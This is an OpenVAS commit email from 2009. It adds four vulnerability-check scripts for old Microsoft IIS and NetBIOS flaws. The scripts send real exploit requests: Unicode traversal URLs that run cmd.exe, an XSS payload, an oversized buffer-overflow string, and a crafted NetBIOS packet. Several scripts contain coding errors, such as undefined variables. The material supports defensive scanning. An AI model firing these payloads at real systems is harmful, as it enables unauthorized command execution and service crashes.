[Openvas-commits] r2809 - in trunk/openvas-plugins: . scripts
scm-commit@wald.intevation.org
scm-commit at wald.intevation.org
Mon Mar 16 23:15:44 CET 2009
Author: edjenguele
Date: 2009-03-16 23:15:41 +0100 (Mon, 16 Mar 2009)
New Revision: 2809
Added:
trunk/openvas-plugins/scripts/remote-MS00-078.nasl
trunk/openvas-plugins/scripts/remote-MS03-018.nasl
trunk/openvas-plugins/scripts/remote-MS03-022.nasl
trunk/openvas-plugins/scripts/remote-MS03-034.nasl
Modified:
trunk/openvas-plugins/ChangeLog
Log:
Added new plugins:
remote-MS00-078.nasl
remote-MS03-018.nasl
remote-MS03-022.nasl
remote-MS03-034.nasl
Modified: trunk/openvas-plugins/ChangeLog
===================================================================
--- trunk/openvas-plugins/ChangeLog 2009-03-16 21:52:10 UTC (rev 2808)
+++ trunk/openvas-plugins/ChangeLog 2009-03-16 22:15:41 UTC (rev 2809)
@@ -1,4 +1,12 @@
2009-03-16 Christian Eric Edjenguele <christian.edjenguele at owasp.org>
+ * script/remote-MS00-078.nasl
+ * script/remote-MS00-034.nasl
+ * script/remote-MS03-022.nasl
+ * script/remote-MS03-018.nasl:
+ Added new plugin
+
+
+2009-03-16 Christian Eric Edjenguele <christian.edjenguele at owasp.org>
* scripts/XRMS_CVE-2008-3664.nasl
* scripts/remote-MS07-040.nasl
* scripts/remote-MS06-056.nasl
@@ -236,17 +244,17 @@
scripts/butterfly_organizer_multiple_vulnerabilities.nasl:
Added new plugins from Michael Meyer
-2009-03-08 Christian Eric Edjenguele <c_edjenguele at yahoo.it>
+2009-03-08 Christian Eric Edjenguele <christian.edjenguele at owasp.org>
* scripts/remote-detect-filemaker-pwd-disclosure.nasl: New.
FileMaker Pro Client Authentication User Password Disclosure
Vulnerability.
-2009-03-08 Christian Eric Edjenguele <c_edjenguele at yahoo.it>
+2009-03-08 Christian Eric Edjenguele <christian.edjenguele at owasp.org>
* scripts/remote-MS00-060.nasl: Setting script ID.
-2009-03-08 Christian Eric Edjenguele <c_edjenguele at yahoo.it>
+2009-03-08 Christian Eric Edjenguele <christian.edjenguele at owasp.org>
* scripts/remote-MS00-060.nasl: New. MS00-060 security check.
Added: trunk/openvas-plugins/scripts/remote-MS00-078.nasl
===================================================================
--- trunk/openvas-plugins/scripts/remote-MS00-078.nasl 2009-03-16 21:52:10 UTC (rev 2808)
+++ trunk/openvas-plugins/scripts/remote-MS00-078.nasl 2009-03-16 22:15:41 UTC (rev 2809)
@@ -0,0 +1,161 @@
+# OpenVAS Vulnerability Test
+# $Id$
+# Description:
+# Microsoft Security Bulletin (MS00-078)
+# 'Web Server Folder Traversal' Vulnerability
+# Microsoft IIS Executable File Parsing Vulnerability (MS00-086)
+#
+# Affected Software:
+# Microsoft Internet Information Server 4.0
+# Microsoft Internet Information Server 5.0
+#
+# remote-MS00-078.nasl
+#
+# Author:
+# Christian Eric Edjenguele <christian.edjenguele at owasp.org>
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2 or later,
+# as published by the Free Software Foundation
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+#
+
+
+
+if(description)
+{
+script_id(101014);
+script_cve_id("CVE-2000-0884");
+script_bugtraq_id(1806);
+name["english"] = "Microsoft MS00-078 security check";
+script_name(english:name["english"]);
+
+desc["english"] = "
+
+Microsoft IIS 4.0 and 5.0 are affected by a web server trasversal vulnerability.
+This vulnerability could potentially allow a visitor to a web site to take a wide range of destructive actions against it,
+including running programs on it.
+
+Solution :
+
+There is not a new patch for this vulnerability. Instead, it is eliminated by the patch that accompanied Microsoft Security Bulletin MS00-057.
+Download locations for this patch
+
+Microsoft IIS 4.0:
+http://support.microsoft.com/kb/269862/en-us
+
+Microsoft IIS 5.0:
+http://technet.microsoft.com/windowsserver/2000/default.aspx
+
+
+
+
+
+Risk factor: high";
+
+
+script_description(english:desc["english"]);
+
+summary["english"] = "Microsoft IIS 4.0 and 5.0 are prone to web server trasversal vulnerabilities";
+
+script_summary(english:summary["english"]);
+
+script_category(ACT_ATTACK);
+
+script_copyright(english:"This script is Written by Christian Eric Edjenguele <christian.edjenguele at owasp.org> and released under GPL v2 or later");
+family["english"] = "Windows : Microsoft Bulletins";
+script_family(english:family["english"]);
+script_require_ports("Services/www");
+
+exit(0);
+}
+
+#
+# The script code starts here
+#
+
+include("http_func.inc");
+include("http_keepalive.inc");
+
+iis = get_kb_list("Services/www");
+
+
+# remote command to run
+r_cmd = '/winnt/system32/cmd.exe?/c+dir+c:';
+
+d = make_list('/scripts/',
+ '/msadc/',
+ '/iisadmpwd/',
+ '/_vti_bin/',
+ '/_mem_bin/',
+ '/exchange/',
+ '/pbserver/',
+ '/rpc/',
+ '/cgi-bin/',
+ '/');
+
+uc = make_list('%c0%af',
+ '%c0%9v',
+ '%c1%c1',
+ '%c0%qf',
+ '%c1%8s',
+ '%c1%9c',
+ '%c1%pc',
+ '%c1%1c',
+ '%c0%2f',
+ '%e0%80%af');
+
+
+h_ip = get_host_ip();
+
+foreach port (iis)
+{
+ soc = open_sock_tcp(port);
+ foreach webdir (d)
+ {
+ foreach uni_code (uc)
+ {
+ # build the malicious url
+ url = strcat(webdir , '..' , uni_code , '..' , uni_code , '..' , uni_code , '..' , uni_code , '..' , uni_code , '..' , r_cmd);
+
+ # build the query, put headers
+ qry = string('GET /' + url + ' HTTP/1.0\r\n',
+ 'Host: ' + h_ip + '\r\n',
+ 'Connection: Keep-Alive\r\n\r\n');
+
+ req = http_get(item:qry, port:port);
+ send(socket:soc, data:req);
+
+ # get back the response
+ reply = recv(socket:soc, length:4096);
+
+ if(reply)
+ return;
+
+ }
+ }
+
+ req = http_get(item:page, port:port);
+ send(socket:soc, data: req);
+
+ reply = recv(socket:soc, length:4096);
+ close(soc);
+
+ if(reply)
+ {
+ header_server = egrep(pattern:"Server", string:reply, icase:TRUE);
+ if(("Microsoft-IIS" >< header_server ) && (egrep(pattern:"HTTP/1.[01] 200", string:reply)) && (("<dir>" >< reply) ||
+ 'directory of' >< reply))
+ report = 'Exploit String' + url + ' for vulnerability:\n' + reply;
+ security_hole(port:port, data:report);
+ }
+}
+
Added: trunk/openvas-plugins/scripts/remote-MS03-018.nasl
===================================================================
--- trunk/openvas-plugins/scripts/remote-MS03-018.nasl 2009-03-16 21:52:10 UTC (rev 2808)
+++ trunk/openvas-plugins/scripts/remote-MS03-018.nasl 2009-03-16 22:15:41 UTC (rev 2809)
@@ -0,0 +1,214 @@
+# OpenVAS Vulnerability Test
+# $Id$
+# Description:
+# Microsoft Security Bulletin MS03-018
+# Cumulative Patch for Internet Information Service (811114)
+# Redirection Cross Site Scripting CAN-2003-0223
+# Server Side Include Web Pages Buffer Overrun CAN-2003-0224
+# ASP Headers Denial of Service CAN-2003-0225
+# Microsoft IIS 'SSINC.DLL' Include Buffer Overflow Vulnerability (MS03-018)
+# WebDAV Denial of Service CAN-2003-0226
+#
+#
+# Affected Software:
+# Microsoft Internet Information Server 4.0
+# Microsoft Internet Information Services 5.0
+# Microsoft Internet Information Services 5.1
+#
+# Non Affected Software:
+# Microsoft Internet Information Services 6.0
+#
+#
+# Tested on:
+#
+# [Windows NT EN]
+# Windows NT SP3 -> 39658520604f0e8aa50f9a81e98ea133 - Vulnerable
+# Windows NT SP6 -> 39658520604f0e8aa50f9a81e98ea133 - Vulnerable
+# Windows NT SP6a + OP -> 39ff5076bc08e9135762e251d2694641 - Not Vulnerable
+# Windows NT SRP -> 39ff5076bc08e9135762e251d2694641 - Not Vulnerable
+#
+# [Windows 2000 EN]
+# Windows 2000 SP0 -> df65cc2183d93eec835e7369e7339080 - Vulnerable
+# Windows 2000 SP1 -> df65cc2183d93eec835e7369e7339080 - Vulnerable
+# Windows 2000 SP2 -> 6ae807197693dc1d9eb364e1e590f69e - Vulnerable
+# Windows 2000 SP2 + ms03-018 Patch -> d17aefa456210ce25b6e315f50a5d8d0 - Not Vulnerable
+# Windows 2000 SP3 -> d17aefa456210ce25b6e315f50a5d8d0 - Vulnerable (Not implemented here)
+# Windows 2000 SP3 + ms03-018 Patch -> d17aefa456210ce25b6e315f50a5d8d0 - Not Vulnerable
+# Windows 2000 SP4 -> d17aefa456210ce25b6e315f50a5d8d0 - Not Vulnerable
+# Windows 2000 SRP -> d17aefa456210ce25b6e315f50a5d8d0 - Not Vulnerable
+# Windows 2000 Windows Update -> d17aefa456210ce25b6e315f50a5d8d0 - Not Vulnerable
+#
+# [Windows 2000 IT]
+# Windows 2000 SP0 -> 81f7ab909260148e04f662fc31e3c336 - Vulnerable
+# Windows 2000 SP1 -> 81f7ab909260148e04f662fc31e3c336 - Vulnerable
+# Windows 2000 SP2 -> a723b2e8e9722b53d616ead1ef86e66b - Vulnerable
+# Windows 2000 SP2 + ms03-018 -> 389fe7f7596a41a13d6eb384e7f964d8 - Not Vulnerable
+# Windows 2000 SP3 -> 389fe7f7596a41a13d6eb384e7f964d8 - Vulnerable (Not implemented here)
+# Windows 2000 SP3 + ms03-018 -> 389fe7f7596a41a13d6eb384e7f964d8 - Not Vulnerable
+# Windows 2000 SP4 -> 389fe7f7596a41a13d6eb384e7f964d8 - Not Vulnerable
+# Windows 2000 SRP -> 389fe7f7596a41a13d6eb384e7f964d8 - Not Vulnerable
+# Windows 2000 Windows Update -> 389fe7f7596a41a13d6eb384e7f964d8 - Not Vulnerable
+#
+# [Windows XP EN]
+# Windows XP SP1 -> 979b3d197cf71be7f98c9d9e9acb61c0 - Vulnerable (Not implemented here)
+# Windows XP SP1 + ms03-018 Patch -> 979b3d197cf71be7f98c9d9e9acb61c0 - Not Vulnerable (No differences in files with unpatched system)
+# Windows XP SP2 -> 979b3d197cf71be7f98c9d9e9acb61c0 - Not Vulnerable (No differences in files with unpatched system)
+#
+# [Windows XP IT]
+# Windows XP SP0 -> a7945dc825ff65fe0c954fa41d763de0 - Vulnerable
+# Windows XP SP1 -> 8e49af43858540be0754bd4f9074871e - Vulnerable (Not implemented here)
+# Windows XP SP1 + ms03-018 Patch -> 8e49af43858540be0754bd4f9074871e - Not Vulnerable (No differences in files with unpatched system)
+# Windows XP SP2 -> 8e49af43858540be0754bd4f9074871e - Not Vulnerable (No differences in files with unpatched system)
+#
+# [Windows 2003 EN]
+# Windows 2003 SP0 -> 23d6b92bc7eb100fc1294e6b124b7e75 - Not Vulnerable
+#
+#
+# End User Bulletin: An end user version of this bulletin is available at: http://www.microsoft.com/athome/security/update/bulletins/default.mspx
+#
+# remote-MS03-018.nasl
+#
+# Author:
+# Christian Eric Edjenguele <christian.edjenguele at owasp.org>
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2 or later,
+# as published by the Free Software Foundation
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+#
+
+
+
+if(description)
+{
+script_id(101017);
+script_cve_id("CAN-2003-0223", "CAN-2003-0224", "CAN-2003-0225", "CAN-2003-0226");
+name["english"] = "Microsoft MS03-018 security check";
+script_name(english:name["english"]);
+
+desc["english"] = "
+
+A Cross-Site Scripting (XSS) vulnerability affecting IIS 4.0, 5.0 and 5.1 involving the error message that's returned to advise that a
+requested URL has been redirected.
+An attacker who was able to lure a user into clicking a link on his or her web site could relay a request containing script to a
+third-party web site running IIS, thereby causing the third-party site's response (still including the script) to be sent to the user.
+The script would then render using the security settings of the third-party site rather than the attacker's.
+A buffer overrun that results because IIS 5.0 does not correctly validate requests for certain types of web pages known as server side includes.
+A denial of service vulnerability that results because of a flaw in the way IIS 4.0 and 5.0 allocate memory requests when constructing
+headers to be returned to a web client.
+A denial of service vulnerability that results because IIS 5.0 and 5.1 do not correctly handle an error condition when
+an overly long WebDAV request is passed to them. As a result an attacker could cause IIS to fail.
+
+
+
+
+Solution :
+
+Microsoft has released a patch to correct these issues
+
+There is a dependency associated with this patch - it requires the patch from Microsoft Security Bulletin MS02-050 to be installed.
+If this patch is installed and MS02-050 is not present, client side certificates will be rejected.
+This functionality can be restored by installing the MS02-050 patch.
+
+IIS 4.0:
+http://www.microsoft.com/downloads/details.aspx?FamilyId=1DBC1914-98E9-4DED-ADBF-E9B374A1F79D&displaylang=en
+
+IIS 5.0:
+http://www.microsoft.com/downloads/details.aspx?FamilyId=2F5D9852-4ADD-44F8-8715-AC3D7D7D94BF&displaylang=en
+
+IIS 5.1:
+32-bit Edition: http://www.microsoft.com/downloads/details.aspx?FamilyId=77CFE3EF-C5C5-401C-BC12-9F08154A5007&displaylang=en
+64-bit Edition: http://www.microsoft.com/downloads/details.aspx?FamilyId=86F4407E-B9BF-4490-9421-008407578D11&displaylang=en
+
+The IIS 4.0 patch can be installed on systems running Windows NT 4.0 Service Pack 6a.
+http://support.microsoft.com/kb/241211
+
+The IIS 5.0 patch can be installed on systems running Windows 2000 Service Pack 2 or Service Pack 3.
+http://www.microsoft.com/windows2000/downloads/servicepacks/sp2/default.mspx
+http://www.microsoft.com/windows2000/downloads/servicepacks/sp3/default.mspx
+
+The IIS 5.1 patch can be installed on systems running Windows XP Professional Gold and Service Pack 1.
+http://www.microsoft.com/windowsxp/downloads/updates/sp1/default.mspx
+
+
+
+
+Risk factor: High";
+
+
+script_description(english:desc["english"]);
+
+summary["english"] = "Internet Information Service Multiples Vulnerabilities MS03-018";
+
+script_summary(english:summary["english"]);
+
+script_category(ACT_ATTACK);
+
+script_copyright(english:"This script is Written by Christian Eric Edjenguele <christian.edjenguele at owasp.org> and released under GPL v2 or later");
+family["english"] = "Windows : Microsoft Bulletins";
+script_family(english:family["english"]);
+script_require_ports("Services/www");
+
+exit(0);
+}
+
+
+
+#
+# The script code starts here
+#
+
+
+include("http_func.inc");
+
+
+iis_servers = get_kb_item("Services/www");
+
+h_ip = get_host_ip();
+qrystr = '/iissamples/sdk/asp/components/redirect.asp?url=<script>alert(openvas)</script>';
+
+# Vulnerable hashes
+# 1 Windows NT SP3 and SP6 EN
+# 2 Windows 2000 SP0 SP1 EN
+# 3 Windows 2000 SP2 EN
+# 4 Windows 2000 SP0 SP1 IT
+# 5 Windows 2000 SP2 IT
+# 6 Windows XP SP0 IT
+
+md5_hashes = make_list('39658520604f0e8aa50f9a81e98ea133',
+ 'df65cc2183d93eec835e7369e7339080',
+ '6ae807197693dc1d9eb364e1e590f69e',
+ '81f7ab909260148e04f662fc31e3c336',
+ 'a723b2e8e9722b53d616ead1ef86e66b',
+ 'a7945dc825ff65fe0c954fa41d763de0');
+
+
+
+foreach port (iis_servers)
+{
+ soc = open_sock_tcp(port);
+
+ req = http_get(item:qrystr, port:port);
+ send(socket:soc, data:req);
+
+ # get back the response
+ reply = recv(socket:soc, length:4096);
+
+ if(reply)
+ {
+ page_hash = md5(reply);
+ for(i = 0; i < max_index(md5_hashes); i++)
+ {
+ if(page_hash == md5_hashes[i]) security_hole(port);
+ }
+
+ }
+}
Added: trunk/openvas-plugins/scripts/remote-MS03-022.nasl
===================================================================
--- trunk/openvas-plugins/scripts/remote-MS03-022.nasl 2009-03-16 21:52:10 UTC (rev 2808)
+++ trunk/openvas-plugins/scripts/remote-MS03-022.nasl 2009-03-16 22:15:41 UTC (rev 2809)
@@ -0,0 +1,151 @@
+# OpenVAS Vulnerability Test
+# $Id$
+# Description:
+# Microsoft Security Bulletin MS03-022
+# Vulnerability in ISAPI Extension for Windows Media Services Could Cause Code Execution
+# Microsoft Windows Media Services 'nsiislog.dll' Buffer Overflow Vulnerability (MS03-019)
+# BUGTRAQ:20030626 Windows Media Services Remote Command Execution #2
+#
+# Affected Software:
+# Microsoft Windows 2000
+#
+# Not Affected Software Versions:
+# Windows NT 4.0
+# Microsoft Windows XP
+# Microsoft Windows Server 2003
+#
+# remote-MS03-022.nasl
+#
+# Author:
+# Christian Eric Edjenguele <christian.edjenguele at owasp.org>
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2 or later,
+# as published by the Free Software Foundation
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+#
+
+
+
+if(description)
+{
+script_id(101016);
+script_cve_id("CAN-2003-0349");
+name["english"] = "Microsoft MS03-022 security check";
+script_name(english:name["english"]);
+
+desc["english"] = "
+
+There is a flaw in the way nsiislog.dll processes incoming client requests.
+A vulnerability exists because an attacker could send specially formed HTTP request (communications)
+to the server that could cause IIS to fail or execute code on the user's system.
+
+
+
+
+
+Solution :
+
+Microsoft has released a patch to correct these issues
+Download locations for this patch
+
+Microsoft Windows 2000:
+http://www.microsoft.com/downloads/details.aspx?FamilyId=F772E131-BBC9-4B34-9E78-F71D9742FED8&displaylang=en
+
+Note: This patch can be installed on systems running Microsoft Windows 2000 Service Pack 2,
+Windows 2000 Service Pack 3 and Microsoft Windows 2000 Service Pack 4.
+This patch has been superseded by the one provided in Microsoft Security Bulletin MS03-019.
+http://www.microsoft.com/technet/security/bulletin/MS03-019.mspx
+
+
+
+
+
+
+Risk factor: Critical";
+
+
+script_description(english:desc["english"]);
+
+summary["english"] = "ISAPI Extension for Windows Media Services Remote Code Execution Vulnerability";
+
+script_summary(english:summary["english"]);
+
+script_category(ACT_ATTACK);
+
+script_copyright(english:"This script is Written by Christian Eric Edjenguele <christian.edjenguele at owasp.org> and released under GPL v2 or later");
+family["english"] = "Windows : Microsoft Bulletins";
+script_family(english:family["english"]);
+script_require_ports("Services/www");
+
+exit(0);
+}
+
+
+#
+# The script code starts here
+#
+
+include("http_func.inc");
+
+
+iis_servers = get_kb_item("Services/www");
+
+h_ip = get_host_ip();
+
+remote_exe = '';
+
+
+
+foreach port (iis_servers)
+{
+ soc = open_sock_tcp(port);
+
+ # request the page
+ qry = string("GET /" , "/scripts/nsiislog.dll" , ' HTTP/1.0\r\n',
+ "Host: " , h_ip , "\r\n",
+ "Connection: Keep-Alive\r\n\r\n");
+
+ req = http_get(item:qry, port:port);
+ send(socket:soc, data:req);
+
+ # get back the response
+ reply = recv(socket:soc, length:4096);
+
+ if(reply)
+ {
+ if('NetShow ISAPI Log Dll' >< reply)
+ {
+ url_args = make_list('date', 'time',
+ 'c-dns', 'cs-uri-stem', 'c-starttime', 'x-duration', 'c-rate',
+ 'c-status', 'c-playerid', 'c-playerversion', 'c-player-language',
+ 'cs(User-Agent)', 'cs(Referer)', 'c-hostexe');
+
+ foreach parameter (url_args) remote_exe += parameter + "=openvas&";
+
+ remote_exe += 'c-ip=' + crap(65535);
+
+ # build the media player client request
+ mpclient = string("POST /", "/scripts/nsiislog.dll", " HTTP/1.0\r\n",
+ "Host: ", h_ip, "\r\n",
+ "User-Agent: ", "NSPlayer/2.0", "\r\n",
+ "Content-Type: ", "application/x-www-form-urlencoded" , "\r\n",
+ "Content-Length: ", strlen(remote_exe) , "\r\n\r\n");
+
+ req2 = http_post(item:mpclient, port:port);
+ send(socket:soc, data:req2);
+ #send(socket:soc, data:remote_exe);
+
+ response = recv(socket:sock, length:4096);
+ if((egrep(pattern:"HTTP/1.[01] 500", string:response)) && ('The remote procedure call failed. ' >< response)) security_hole(port);
+ }
+ }
+}
Added: trunk/openvas-plugins/scripts/remote-MS03-034.nasl
===================================================================
--- trunk/openvas-plugins/scripts/remote-MS03-034.nasl 2009-03-16 21:52:10 UTC (rev 2808)
+++ trunk/openvas-plugins/scripts/remote-MS03-034.nasl 2009-03-16 22:15:41 UTC (rev 2809)
@@ -0,0 +1,155 @@
+# OpenVAS Vulnerability Test
+# $Id$
+# Description:
+# Microsoft Security Bulletin MS03-034
+# Flaw in NetBIOS Could Lead to Information Disclosure
+#
+# Affected software
+#
+# Microsoft Windows NT Workstation 4.0
+# Microsoft Windows NT Server 4.0®
+# Microsoft Windows NT Server 4.0, Terminal Server Edition
+# Microsoft Windows 2000
+# Microsoft Windows XP
+# Microsoft Windows Server 2003
+#
+# Not Affected Software:
+#
+# Microsoft Windows Millennium Edition
+#
+#
+# remote-MS03-034.nasl
+#
+# Author:
+# Christian Eric Edjenguele <christian.edjenguele at owasp.org>
+#
+# This program is free software; you can redistribute it and/or modify
+# it under the terms of the GNU General Public License version 2 or later,
+# as published by the Free Software Foundation
+#
+# This program is distributed in the hope that it will be useful,
+# but WITHOUT ANY WARRANTY; without even the implied warranty of
+# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
+# GNU General Public License for more details.
+#
+# You should have received a copy of the GNU General Public License
+# along with this program; if not, write to the Free Software
+# Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA.
+#
+
+
+
+
+ if(description)
+{
+script_id(101015);
+script_cve_id("CAN-2003-0661");
+name["english"] = "Microsoft MS03-034 security check";
+script_name(english:name["english"]);
+
+desc["english"] = "
+Under certain conditions, the response to a NetBT Name Service query may, in addition to the typical reply,
+contain random data from the target system's memory. This data could, for example, be a segment of HTML
+if the user on the target system was using an Internet browser, or it could contain other types of data
+that exist in memory at the time that the target system responds to the NetBT Name Service query.
+An attacker could seek to exploit this vulnerability by sending a NetBT Name Service query to the target system
+and then examine the response to see if it included any random data from that system's memory.
+
+
+
+
+
+
+Solution :
+Microsoft has released a patch to fix this issue, download it from the following website:
+
+Windows Server 2003
+http://www.microsoft.com/downloads/details.aspx?FamilyId=A59CC2AC-F182-4CD5-ACE7-3D4C2E3F1326&displaylang=en
+
+Windows Server 2003 64 bit Edition
+http://www.microsoft.com/downloads/details.aspx?FamilyId=140CF7BE-0371-4D17-8F4C-951B76AC3024&displaylang=en
+
+Windows XP
+http://www.microsoft.com/downloads/details.aspx?FamilyId=1C9D8E86-5B8C-401A-88B2-4443FFB9EDC3&displaylang=en
+
+Windows XP 64 bit Edition
+http://www.microsoft.com/downloads/details.aspx?FamilyId=378D4B58-BF2C-4406-9D88-E6A3C4601795&displaylang=en
+
+Windows 2000
+http://www.microsoft.com/downloads/details.aspx?FamilyId=D0564162-4EAE-42C8-B26C-E4D4D496EAD8&displaylang=en
+
+Windows NT Server 4.0
+http://www.microsoft.com/downloads/details.aspx?FamilyId=F131D63A-F74F-4CAF-95BD-D7FA37ADCF38&displaylang=en
+
+Windows NT Server 4.0, Terminal Server Edition
+http://www.microsoft.com/downloads/details.aspx?FamilyId=22379951-64A9-446B-AC8F-3F2F080383A9&displaylang=en
+
+
+
+Risk factor : Low";
+
+script_description(english:desc["english"]);
+
+summary["english"] = "Flaw in NetBIOS Could Lead to Information Disclosure";
+
+script_summary(english:summary["english"]);
+
+script_category(ACT_ATTACK);
+
+script_copyright(english:"This script is Written by Christian Eric Edjenguele <christian.edjenguele at owasp.org> and released under GPL v2 or later");
+family["english"] = "Windows : Microsoft Bulletins";
+script_family(english:family["english"]);
+script_dependencies("find_service.nes");
+script_require_ports("137");
+
+
+ exit(0);
+}
+
+
+
+#
+# The script code starts here
+#
+
+
+# default NetBIOS udp port
+port = 137;
+
+matrix = make_array();
+
+# Build the malicious packet
+request = raw_string("\x7c\x54\x00\x00\x00\x01\x00\x00\x00\x00\x00\x00",
+ "\x20\x43\x4B\x41\x41\x41\x41\x41\x41\x41\x41\x41",
+ "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41",
+ "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x00\x00\x21",
+ "\x00\x01");
+
+for(i = 0; i < 50; i++)
+{
+ soc = open_sock_udp(port);
+ send(socket:soc, data:request);
+
+ response = recv(socket:soc, length:4096, timeout:20);
+ close(soc);
+
+ if(strlen(response) > 58 )
+ {
+ min = strlen(response) - 58;
+ element = substr(response, min, strlen(response));
+ matrix[max_index(matrix)] = element;
+ }
+
+ # the length of the aray
+ dim = max_index(matrix) - 1;
+ if(dim > 1)
+ {
+ for(j = 0; j < i; j++)
+ if(matrix[j] != matrix[i])
+ # Report Microsoft Windows 'NetBT Name Service' Information Leakage Vulnerability (MS03-034)
+ security_warning(port);
+ }
+
+}
+
+
More information about the Openvas-commits
mailing list